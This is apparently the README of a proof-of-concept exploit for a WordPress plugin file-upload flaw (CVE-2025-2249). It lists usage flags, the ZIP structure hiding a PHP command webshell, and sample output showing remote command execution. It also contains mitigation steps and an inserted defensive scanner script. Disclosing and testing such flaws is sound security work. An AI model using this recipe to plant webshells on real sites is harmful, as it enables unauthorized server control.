
CVE-2025-2249 PoC — SoJ Soundslides <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload

Associated Vulnerability
Title: SoJ Soundslides <= 1.2.2 - Authenticated (Contributor+) Arbitrary File Upload (CVE-2025-2249)
Description: The SoJ SoundSlides plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the soj_soundslides_options_subpanel() function in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
Description
WordPress SoJ SoundSlides Plugin <= 1.2.2 is vulnerable to Arbitrary File Upload
Readme

# 🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authenticated Arbitrary File Upload

> ⚠️ **DISCLAIMER:** This exploit is for educational and authorized testing purposes only.

---

## 📌 Vulnerability Summary

- **Plugin:** SoJ SoundSlides  
- **Affected Versions:** <= 1.2.2  
- **Type:** Authenticated (Contributor+) Arbitrary File Upload  
- **Patch Status:** ❌ No official fix available

The SoJ SoundSlides plugin allows authenticated users with **Contributor or higher** roles to upload arbitrary ZIP files. Due to missing validation, attackers can upload PHP webshells that are extracted and executed from a web-accessible directory.

---

## 💥 Impact

An attacker with valid WordPress credentials can:

- 📦 Upload a ZIP archive containing a PHP shell
- 🖥️ Execute system commands remotely (`?cmd=`)
- 🔓 Gain unauthorized control of the site/server

---

## 🛠️ Usage

```bash
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

| Argument  | Description                    |
|-----------|--------------------------------|
| `-u`      | WordPress base URL             |
| `-un`     | WordPress username             |
| `-p`      | WordPress password             |

---

## ✨ Features

- 🔍 Version check from plugin `readme.txt`
- 🧰 Auto-generates ZIP with required structure and webshell
- 📤 Exploits vulnerable upload endpoint
- 💻 Interactive command execution via uploaded shell

---

## 📂 ZIP File Structure

```
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)
```

---

## 🧪 Example

```bash
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
```
---

## 🛡️ Mitigation

- ❌ Disable or remove the plugin
- 🧱 Apply upload restrictions
- 🔍 Monitor `wp-content/uploads/` for unexpected `.php` files
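Two of the checks above can be automated. The following is an added example, not part of the original PoC: it walks an uploads tree and flags files with server-side code extensions (which should never exist under `wp-content/uploads/`), and it reads the `Stable tag:` line from a plugin `readme.txt` to tell whether an installed copy is in the affected `<= 1.2.2` range. The sample directory tree and the extension list are constructed for demonstration.

```python
import os
import re
import tempfile
from pathlib import Path

# Extensions that should never appear under wp-content/uploads (assumed list).
CODE_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".phar"}


def find_code_in_uploads(uploads_dir):
    """Walk an uploads tree and return sorted relative paths of files whose
    extension indicates server-side code. A clean tree yields an empty list."""
    uploads = Path(uploads_dir)
    hits = []
    for root, _dirs, files in os.walk(uploads):
        for name in files:
            if Path(name).suffix.lower() in CODE_EXTENSIONS:
                hits.append(Path(root, name).relative_to(uploads).as_posix())
    return sorted(hits)


def is_vulnerable_version(readme_text, affected_max=(1, 2, 2)):
    """Read 'Stable tag:' from a plugin readme.txt and return True when the
    version is <= 1.2.2 (the affected range), False when newer, None when
    no version line is present. Components are compared numerically."""
    m = re.search(r"^Stable tag:\s*([0-9]+(?:\.[0-9]+)*)", readme_text, re.M | re.I)
    if not m:
        return None
    version = tuple(int(part) for part in m.group(1).split("."))
    return version <= affected_max


def build_sample_uploads():
    """Create a constructed uploads tree: benign media plus a PHP file at the
    path the PoC output above shows; returns the temporary base directory."""
    base = Path(tempfile.mkdtemp(prefix="uploads-"))
    for rel in ("2025/03/photo.jpg",
                "SoundSlides/nxploit_shell/index.html",
                "SoundSlides/nxploit_shell/audio/audio.mp3",
                "SoundSlides/nxploit_shell/nxploit.php"):
        path = base / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("sample")
    return base


if __name__ == "__main__":
    sample = build_sample_uploads()
    print(find_code_in_uploads(sample))  # ['SoundSlides/nxploit_shell/nxploit.php']
    print(is_vulnerable_version("=== SoJ SoundSlides ===\nStable tag: 1.2.2\n"))  # True
```

Point `find_code_in_uploads` at the real `wp-content/uploads/` directory and `is_vulnerable_version` at the contents of `wp-content/plugins/soj-soundslides/readme.txt` (path assumed) to run the checks on a live install.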
> Built with ❤️ by [Nxploited | Khaled ALenazi]  
> For education, awareness, and defense.

---

## 🧠 Final Note

Security is everyone's responsibility. Always test ethically, report responsibly, and protect the web.
